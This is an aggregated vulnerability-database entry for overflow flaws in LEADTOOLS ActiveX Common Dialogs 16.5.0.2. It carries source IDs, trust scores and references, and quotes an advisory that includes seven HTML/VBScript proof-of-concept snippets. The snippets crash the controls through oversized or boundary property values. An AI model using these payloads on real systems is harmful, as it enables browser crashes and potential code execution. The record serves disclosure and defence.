ID

VAR-201009-0424


TITLE

LEADCOXImgEfxDlgu.dll Control Remote Code Execution Vulnerability in LEADTOOLS Imaging Common Dialogs

Trust: 0.6

sources: CNVD: CNVD-2010-1839

DESCRIPTION

LEADTOOLS Imaging Common Dialogs provides professional-grade imaging common dialogs for graphics processing, transformations, and effects. The LtocxImgEfxDlgu. ActiveX control provided by Imaging Common Dialogs does not properly filter input parameters. Users who are tricked into accessing malicious web pages and transmitting long parameters may cause arbitrary code execution. An attacker may exploit these issues to execute arbitrary code within the context of the application (typically Internet Explorer) that invoked the ActiveX control. Failed exploit attempts will result in a denial-of-service condition. Product Web Page: http://www.leadtools.com Affected version: 16.5.0.2 Summary: With LEADTOOLS you can control any scanner, digital camera or capture card that has a TWAIN (32 and 64 bit) device driver. High-level acquisition support is included for ease of use while low-level functionality is provided for flexibility and control in even the most demanding scanning applications. Desc: LEADTOOLS ActiveX Common Dialogs suffers from multiple remote vulnerabilities (IoF, BoF, DoS) as it fails to sanitize the input in different objects included in the Common Dialogs class. ActiveX Common Dialogs (File) -------------------> LtocxFileDlgu.dll - RegKey Safe for Script: True - RegKey Safe for Init: True Tested On: Microsoft Windows XP Professional SP3 (EN) Windows Internet Explorer 8.0.6001.18702 RFgen Mobile Development Studio 4.0.0.06 (Enterprise) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk 24.08.2010 Zero Science Lab Advisory ID: ZSL-2010-4961 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4961.php ############################################################## Proof of Concept: ############################################################## 1. (Web, LtocxWebDlgu.dll / LTRDWU.DLL): ------------------------------------------------------ <object classid='clsid:00165B53-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxWebDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGWEBLib_U.LEADRasterDlgWeb_U" argCount = 1 arg1=-1 target.Bitmap = arg1 </script> 2. (Effects, LtocxEfxDlgu.dll / LTRDEU.DLL): ------------------------------------------------------ <object classid='clsid:00165B5B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxEfxDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGEFXLib_U.LEADRasterDlgEfx_U" argCount = 1 arg1=-1 target.Bitmap = arg1 </script> 3. (Image, LtocxImgDlgu.dll / LTRDMU.DLL): ------------------------------------------------------ <object classid='clsid:00165C7B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxImgDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGLib_U.LEADRasterDlgImg_U" argCount = 1 arg1=2147483647 target.Bitmap = arg1 </script> 4. (Image Effects, LtocxImgEfxDlgu.dll / LTRDXU.DLL): ------------------------------------------------------ <object classid='clsid:00165B57-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxImgEfxDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGEFXLib_U.LEADRasterDlgImgEfx_U" argCount = 1 arg1=-2147483647 target.Bitmap = arg1 </script> 5. (Image Document, LtocxImgDocDlgu.dll / LTRDOU.DLL): ------------------------------------------------------ <object classid='clsid:00165B69-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxImgDocDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGDOCLib_U.LEADRasterDlgImgDoc_U" argCount = 1 arg1=2147483647 target.Bitmap = arg1 </script> 6. (Color, LtocxClrDlgu.dll / LTRDRU.DLL): ------------------------------------------------------ <object classid='clsid:00165B4F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\LEAD Technologies\LEADTOOLS Active-X 16.5\Bin\CDLL\Win32\LtocxClrDlgu.dll" prototype = "Property Let UserPalette ( ByVal iIndex As Integer ) As Long" memberName = "UserPalette" progid = "LTRASTERDLGCLRLib_U.LEADRasterDlgClr_U" argCount = 2 arg1=1 arg2=-2147483647 target.UserPalette(arg1 ) = arg2 </script> 7. (File, LtocxFileDlgu.dll / LTRDFU.DLL): ------------------------------------------------------ <object classid='clsid:00165C87-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxFileDlgu.dll" prototype = "Property Let DestinationPath As String" memberName = "DestinationPath" progid = "LTRASTERDLGFILELib_U.LEADRasterDlgFile_U" argCount = 1 arg1=String(9236, "A") target.DestinationPath = arg1 </script>

Trust: 4.23

sources: CNVD: CNVD-2010-1839 // CNVD: CNVD-2010-1838 // CNVD: CNVD-2010-1840 // CNVD: CNVD-2010-1837 // CNVD: CNVD-2010-1841 // CNVD: CNVD-2010-1842 // CNVD: CNVD-2010-1836 // BID: 42911 // ZSL: ZSL-2010-4961 // PACKETSTORM: 93403

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 4.2

sources: CNVD: CNVD-2010-1839 // CNVD: CNVD-2010-1838 // CNVD: CNVD-2010-1840 // CNVD: CNVD-2010-1837 // CNVD: CNVD-2010-1841 // CNVD: CNVD-2010-1842 // CNVD: CNVD-2010-1836

AFFECTED PRODUCTS

vendor:leadtoolsmodel:imaging common dialogsscope:eqversion:16.5.0.2

Trust: 3.6

vendor:nomodel: - scope: - version: -

Trust: 0.6

vendor:leadtoolsmodel:imaging activexscope:eqversion:16.5

Trust: 0.3

vendor:leadmodel:leadtools activex common dialogsscope:eqversion:16.5.0.2

Trust: 0.1

sources: ZSL: ZSL-2010-4961 // CNVD: CNVD-2010-1839 // CNVD: CNVD-2010-1838 // CNVD: CNVD-2010-1840 // CNVD: CNVD-2010-1837 // CNVD: CNVD-2010-1841 // CNVD: CNVD-2010-1842 // CNVD: CNVD-2010-1836 // BID: 42911

CVSS

SEVERITY

CVSSV2

CVSSV3

ZSL: ZSL-2010-4961
value: (4/5)

Trust: 0.1

sources: ZSL: ZSL-2010-4961

THREAT TYPE

network

Trust: 0.3

sources: BID: 42911

TYPE

Boundary Condition Error

Trust: 0.3

sources: BID: 42911

EXPLOIT AVAILABILITY

sources: ZSL: ZSL-2010-4961

EXTERNAL IDS

db:EXPLOIT-DBid:14852

Trust: 4.3

db:CNVDid:CNVD-2010-1839

Trust: 0.6

db:CNVDid:CNVD-2010-1838

Trust: 0.6

db:CNVDid:CNVD-2010-1840

Trust: 0.6

db:CNVDid:CNVD-2010-1837

Trust: 0.6

db:CNVDid:CNVD-2010-1841

Trust: 0.6

db:CNVDid:CNVD-2010-1842

Trust: 0.6

db:CNVDid:CNVD-2010-1836

Trust: 0.6

db:BIDid:42911

Trust: 0.4

db:ZSLid:ZSL-2010-4961

Trust: 0.3

db:PACKETSTORMid:93403

Trust: 0.1

sources: ZSL: ZSL-2010-4961 // CNVD: CNVD-2010-1839 // CNVD: CNVD-2010-1838 // CNVD: CNVD-2010-1840 // CNVD: CNVD-2010-1837 // CNVD: CNVD-2010-1841 // CNVD: CNVD-2010-1842 // CNVD: CNVD-2010-1836 // BID: 42911 // PACKETSTORM: 93403

REFERENCES

url:http://www.exploit-db.com/exploits/14852/

Trust: 4.3

url:http://leadtools.com/downloads/default.htm

Trust: 0.3

url:http://www.leadtools.com/sdk/common-dialog/default.htm

Trust: 0.3

url:http://support.microsoft.com/kb/240797

Trust: 0.3

url:http://www.packetstormsecurity.org/filedesc/zsl-2010-4961.txt.html

Trust: 0.1

url:http://www.vfocus.net/art/20100902/7791.html

Trust: 0.1

url:http://www.venustech.com.cn/newsinfo/124/8057.html

Trust: 0.1

url:http://net-security.org/vuln.php?id=14060

Trust: 0.1

url:http://www.securityfocus.com/bid/42911

Trust: 0.1

url:http://www.leadtools.com

Trust: 0.1

url:http://www.zeroscience.mk/en/vulnerabilities/zsl-2010-4961.php

Trust: 0.1

url:http://www.zeroscience.mk

Trust: 0.1

sources: ZSL: ZSL-2010-4961 // CNVD: CNVD-2010-1839 // CNVD: CNVD-2010-1838 // CNVD: CNVD-2010-1840 // CNVD: CNVD-2010-1837 // CNVD: CNVD-2010-1841 // CNVD: CNVD-2010-1842 // CNVD: CNVD-2010-1836 // BID: 42911 // PACKETSTORM: 93403

CREDITS

LiquidWorm

Trust: 0.4

sources: BID: 42911 // PACKETSTORM: 93403

SOURCES

db:ZSLid:ZSL-2010-4961
db:CNVDid:CNVD-2010-1839
db:CNVDid:CNVD-2010-1838
db:CNVDid:CNVD-2010-1840
db:CNVDid:CNVD-2010-1837
db:CNVDid:CNVD-2010-1841
db:CNVDid:CNVD-2010-1842
db:CNVDid:CNVD-2010-1836
db:BIDid:42911
db:PACKETSTORMid:93403

LAST UPDATE DATE

2022-10-19T22:39:18.968000+00:00


SOURCES UPDATE DATE

db:ZSLid:ZSL-2010-4961date:2010-10-26T00:00:00
db:CNVDid:CNVD-2010-1839date:2010-09-07T00:00:00
db:CNVDid:CNVD-2010-1838date:2010-09-06T00:00:00
db:CNVDid:CNVD-2010-1840date:2010-09-07T00:00:00
db:CNVDid:CNVD-2010-1837date:2010-09-06T00:00:00
db:CNVDid:CNVD-2010-1841date:2010-09-07T00:00:00
db:CNVDid:CNVD-2010-1842date:2010-09-07T00:00:00
db:CNVDid:CNVD-2010-1836date:2010-09-06T00:00:00
db:BIDid:42911date:2010-09-01T00:00:00

SOURCES RELEASE DATE

db:ZSLid:ZSL-2010-4961date:2010-09-01T00:00:00
db:CNVDid:CNVD-2010-1839date:2010-09-07T00:00:00
db:CNVDid:CNVD-2010-1838date:2010-09-06T00:00:00
db:CNVDid:CNVD-2010-1840date:2010-09-07T00:00:00
db:CNVDid:CNVD-2010-1837date:2010-09-06T00:00:00
db:CNVDid:CNVD-2010-1841date:2010-09-07T00:00:00
db:CNVDid:CNVD-2010-1842date:2010-09-07T00:00:00
db:CNVDid:CNVD-2010-1836date:2010-09-06T00:00:00
db:BIDid:42911date:2010-09-01T00:00:00
db:PACKETSTORMid:93403date:2010-09-01T20:24:41